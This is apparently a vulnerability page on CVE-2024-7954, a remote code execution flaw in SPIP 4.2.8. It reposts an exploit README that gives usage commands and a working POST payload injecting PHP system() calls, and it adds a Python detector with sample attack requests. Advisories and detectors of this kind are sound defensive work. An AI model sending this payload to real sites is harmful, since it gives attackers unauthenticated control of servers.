SPIP 4.2.8 Remote Command Execution (RCE) Vulnerability

Vulnerability Information

Vulnerability name: SPIP 4.2.8 Remote Command Execution (RCE) Vulnerability

Vulnerability ID:

  • CVE: CVE-2024-7954

Vulnerability type: command execution

Severity: Critical

Description: SPIP is a popular content management system (CMS) widely used to build and manage websites. It offers a user-friendly interface and a rich feature set suited to sites of all sizes. The porte_plume_previsu endpoint in SPIP 4.2.8 contains a remote code execution (RCE) vulnerability that lets an unauthenticated attacker inject PHP code by having a crafted image tag rendered in the preview. The technical root cause is improper validation of user input, which allows arbitrary system commands to be executed. The vulnerability is severe because it gives an attacker full control of the affected system: arbitrary code execution can lead to data theft, service disruption or other malicious activity. Because the attack requires no authentication and can be automated, it poses a serious threat to sites running SPIP 4.2.8.

Vendor: SPIP

Product: SPIP CMS

Affected version: 4.2.8

Source: https://github.com/r0otk3r/CVE-2024-7954

Type: CVE-2024:github search

Repository files

  • README.md

Source Overview

CVE-2024-7954 - SPIP 4.2.8 Remote Command Execution (RCE) Exploit

This tool exploits a Remote Code Execution vulnerability in SPIP version 4.2.8 via the porte_plume_previsu endpoint. The vulnerability allows unauthenticated attackers to inject PHP code through preview rendering of crafted image tags.

CVE ID: CVE-2024-7954
Component: SPIP CMS (porte_plume_previsu)
Impact: Unauthenticated Remote Command Execution
Severity: Critical


Exploit Capabilities

  • Execute arbitrary system commands
  • Retrieve live command output
  • Automatically extract and display IP geolocation info
  • Proxy support (Burp/ZAP or other)

Usage

```bash
python3 cve_2024_7954_rce.py --url <TARGET_URL> --cmd <COMMAND> [--proxy <IP:PORT>]
```

Example:

```bash
python3 cve_2024_7954_rce.py --url "http://192.168.1.10:7001" --cmd "whoami" --proxy "127.0.0.1:8080"
```

[screenshot: output of whoami]

Burp Suite Exploit Request/Response:

[screenshot: Burp Suite request/response for whoami]

```bash
python3 cve_2024_7954_rce.py --url "http://192.168.1.10:7001" --cmd "id" --proxy "127.0.0.1:8080"
```

[screenshot: output of id]

Burp Suite Exploit Request/Response:

[screenshot: Burp Suite request/response for id]

```bash
python3 cve_2024_7954_rce.py --url "http://192.168.1.10:7001" --cmd "uname -a" --proxy "127.0.0.1:8080"
```

[screenshot: output of uname -a]

Burp Suite Exploit Request/Response:

[screenshot: Burp Suite request/response for uname -a]
Exploit Payload (POST)

```http
POST /index.php?action=porte_plume_previsu HTTP/1.1
Content-Type: application/x-www-form-urlencoded

data=AA_[<img>->URL`<?php system('command'); ?>`]_BB
```
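As an added defensive example (not code from the r0otk3r repository or from SPIP), the following Python classifies captured HTTP requests by whether they match the request shape documented above: a request to `action=porte_plume_previsu` whose `data` parameter carries a PHP open tag inside the `[<img>->URL`...`]` shortcut. It assumes the detector sees request bodies (a WAF, reverse proxy or ModSecurity-style audit log), since a plain access log records only the request line and would show nothing beyond the action name. The sample requests, the function names and the verdict labels are my own constructions.

```python
"""Classify captured HTTP requests against the CVE-2024-7954 request shape.

Added detection example, not code from the exploit repository or from SPIP.
Assumes request bodies are available (WAF / reverse proxy / audit log); the
sample requests at the bottom are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# The SPIP action named in the advisory.
VULN_ACTION = "porte_plume_previsu"

# PHP open tags: "<?php", "<?=" and the short tag "<?" followed by whitespace.
# Requiring whitespace after "<?" avoids flagging an XML prolog ("<?xml").
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)

# Shape of the published payload: a SPIP image shortcut turned into a link
# whose URL is a backtick-quoted raw value, i.e.  [<img>->URL`...`]
IMG_URL_SHORTCUT = re.compile(r"\[<img\d*>\s*->\s*URL`", re.IGNORECASE)


def classify_request(method: str, target: str, body: str) -> dict:
    """Return a verdict for one request.

    verdict is one of:
      'benign'     - does not touch the preview action
      'preview'    - preview action, no PHP tag (normal editor traffic)
      'suspicious' - preview action, PHP open tag in 'data'
      'exploit'    - preview action, PHP open tag inside [<img>->URL`...`]
    """
    parts = urlsplit(target)
    params = parse_qs(parts.query)           # query-string parameters
    if method.upper() == "POST":             # merge form-encoded body params
        for key, values in parse_qs(body).items():
            params.setdefault(key, []).extend(values)

    action_hit = VULN_ACTION in params.get("action", [])
    data_values = params.get("data", [])     # already percent-decoded
    php_tag = any(PHP_OPEN_TAG.search(d) for d in data_values)
    shortcut = any(IMG_URL_SHORTCUT.search(d) for d in data_values)

    if action_hit and php_tag and shortcut:
        verdict = "exploit"
    elif action_hit and php_tag:
        verdict = "suspicious"
    elif action_hit:
        verdict = "preview"
    else:
        verdict = "benign"
    return {"action_hit": action_hit, "php_tag": php_tag,
            "shortcut": shortcut, "verdict": verdict}


# Constructed sample traffic: (method, request-target, body).
SAMPLE_REQUESTS = [
    # Shape of the published payload, percent-encoded as a client would send it.
    ("POST", "/index.php?action=porte_plume_previsu",
     "data=AA_%5B%3Cimg%3E-%3EURL%60%3C%3Fphp+system%28%27id%27%29%3B+%3F%3E%60%5D_BB"),
    # A normal editor preview using SPIP's own image shortcut.
    ("POST", "/index.php?action=porte_plume_previsu",
     "data=Bonjour+%5B%3Cimg1%7Cleft%3E%5D"),
    # Ordinary page view.
    ("GET", "/spip.php?page=sommaire", ""),
]


def scan(requests):
    """Return the verdict for each (method, target, body) tuple, in order."""
    return [classify_request(*req)["verdict"] for req in requests]


if __name__ == "__main__":
    for (method, target, body), verdict in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(f"{verdict:10s} {method} {target}")
```

Legitimate editors also call the preview action, so a bare hit on the action is only a `preview` verdict; it becomes `suspicious` when `data` carries a PHP open tag and `exploit` when that tag sits inside the image-link shortcut from the published payload. Until the instance is patched, dropping requests that classify as `suspicious` or `exploit` at the proxy is a cheap stopgap, and any `exploit` hit should be treated as a probable compromise rather than a blocked attempt.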

⚠️ Disclaimer

This tool is for educational and authorized security testing only. Unauthorized use is illegal and unethical.


Source page: http://example.com/2025/07/08/github_3675281231/
Author: lianccc
Published: 8 July 2025